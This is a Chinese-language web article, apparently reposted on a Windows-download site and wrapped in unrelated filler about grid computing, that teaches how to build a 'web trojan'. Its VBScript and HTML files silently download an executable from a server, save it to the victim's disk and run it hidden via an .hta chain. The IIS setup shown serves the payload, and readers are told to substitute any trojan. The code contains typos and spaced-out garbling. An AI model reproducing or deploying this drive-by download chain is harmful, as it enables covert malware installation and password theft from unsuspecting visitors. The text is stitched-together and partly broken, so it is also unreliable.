|
網絡技術是從1990年代中期發(fā)展起來的新技術,它把互聯(lián)網上分散的資源融為有機整體,實現資源的全面共享和有機協(xié)作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯(lián)網只限于信息共享,網絡則被認為是互聯(lián)網發(fā)展的第三階段。 我們經常聽到這樣的忠告:“不要隨意下在不明的程序,不要隨意打開郵件的附件...”這樣的忠告確實是有用的,不過我們的系統(tǒng)有不少漏洞,許多木馬已經不需要客戶端和服務端了,他們利用這些系統(tǒng)漏洞按照被系統(tǒng)認為合法的代碼執(zhí)行木馬的功能,有的木馬會在你完全不知道的情況下潛入,現在我來講解下通過IE6的漏洞實現訪問網頁后神不知鬼不覺的下在并執(zhí)行指定程序的例子,也就是網頁木馬.首先我們需要編寫幾個簡單的文件 一、名字為abc.abc的文件 <html> <script language="vbscript"> Function HttpDoGet(url) set oReq = CreateObject("Microsoft.XMLHTTP") oReq.open "GET",url,false oReq.send If oReq.status=200 then HttpDoGet=oReq.respomseBody Savefile HttpDoGet,"c:\win.exe" End If Set oReq=nothing End Function sub SaveFile(str.fName) Set objStream = CreateObject("ADODB.Stream") objStream.Type =1 objStream.Open objStream.write str objStream.SaveToFile fName.2 objStream.Close() set objStream = nothing exewin() End sub Sub exewin() set wshshell=createobject ("wscript.shell" ) a=wshshell.run ("cmd.exe /c c:\win.exe",0) b=wshshell.run ("cmd.exe /c del c:\win.hta",0) window.close End Sub HttpDoGet "http://127.0.0.1/test.exe" </script> </html> 其中test.exe為木馬程序,實現必須放在WEB發(fā)布的目錄下,文件abc.abc也必須保存在發(fā)布的目錄下。 二、名字為test.htm的文件 <html><body> 木馬運行測試!(這句話可以改成你想說的) <object date="http://127.0.0.1/win.test";;;></object> </body></html> 三、名字為win.test的文件 <html> <body> <script language="vbscript"> Function HttpDoGet(url) set oReq = CreateObject("Microsoft.XMLHTTP") oReq.open "GET",url,false oReq.send If oReq.status=200 then HttpDoGet,"c:\win.hta" Set oReq=nothing End if end function sub SaveFile(str,fName) Dim fso, tf S e t f s o = C r e a t e O b j e c t(Scripting.FileSystemObject") Set tf = fso.CreateTextfile(fName,True) tf.Write str tf.Close exewin() End sub Sub exewin() set wshshell=createobject ("wscript.shell" ) a=wshshell.run ("cmd.exe /c c:\win.hat",0) window.close End Sub HttpDoGet("http://127.0.0.1/abc.abc") </script> </body> </html> [page_break]四、名字為test.exe的木馬程序。 暈...這個就不用我提供了吧,你想用什么木馬就把他的名字換成test.exe傳上去就可以了。 服務器的文件列表 test.htm:對外發(fā)布的網頁 win.test:下在文件abc.abc到對方機器上,并且保存為win.hta并且執(zhí)行。 abc.abc下載二進制的木馬文件test.exe,并執(zhí)行。 test.exe:木馬程序。 上面所說的文件可以修改成任意名字,只是不要忘記把源碼里的文件指向也修改就可以了! 最后是設置IIS,打開“程序→管理工具→internet服務管理器”,右鍵單擊要設置的站點,選擇《屬性》,在選擇“http頭”。單擊“MIME映射”里的“文件類型”按鈕,并在關聯(lián)擴展名文本框中輸入“.hta”,在內容類型(MIME)中輸入“application/hta",然后關閉所有窗口就可以了。 有許多朋友多遇見過,說什么贈送Q號或者玩網游的時候里面有人喊贈送好東東在XXX網址,其實那上面所說的例子用的就是這種原理,不知不覺中你機器上的所有有關于密碼或者指定名詞的東西全發(fā)送到對方指定的郵件箱里去了 看完后是否覺得這種木馬太危險,甚至有種想把網線拔掉的感覺那?呵呵,其實了解了網頁木馬的工作原理后我們就不難防護他,看完以上內容后就可以得出一個結論,網頁木馬主要利用IE的漏洞來實現的,所以在預防的時候一定要做到以下幾點就可以保證上網的安全了, A、安裝IE的最新版本并且隨時下在才做系統(tǒng)和IE的補丁程序。 B、不隨便登陸不熟悉朋友送來的網站,對于熟悉的朋友也要小心哦。 C、不隨便登陸黑客網站(^_^黑基除外了啦,我擔保的...),色情網站,尤其一些賣外掛,賣木馬的網站。 D、不隨便打開和預覽有附件的郵件。 E、安裝防火墻和殺毒軟件的最新版本,經常進行升級和查毒。 網絡的神奇作用吸引著越來越多的用戶加入其中,正因如此,網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......,各項技術都需要適時應勢,對應發(fā)展,這正是網絡迅速走向進步的催化劑。 |
溫馨提示:喜歡本站的話,請收藏一下本站!
本站發(fā)布的Win7純凈版系統(tǒng)、Win10純凈版和XP純凈版系統(tǒng)僅為個人學習測試使用,請在下載后24小時內刪除,不得用于任何商業(yè)用途,否則后果自負,請支持購買微軟正版軟件!
本站所有資源全部來自于網絡資源,如侵犯到您的權益,請及時通知我們(),我們會及時處理.
Copyright © 2018-2020 蘿卜系統(tǒng) 手機站 關于本站
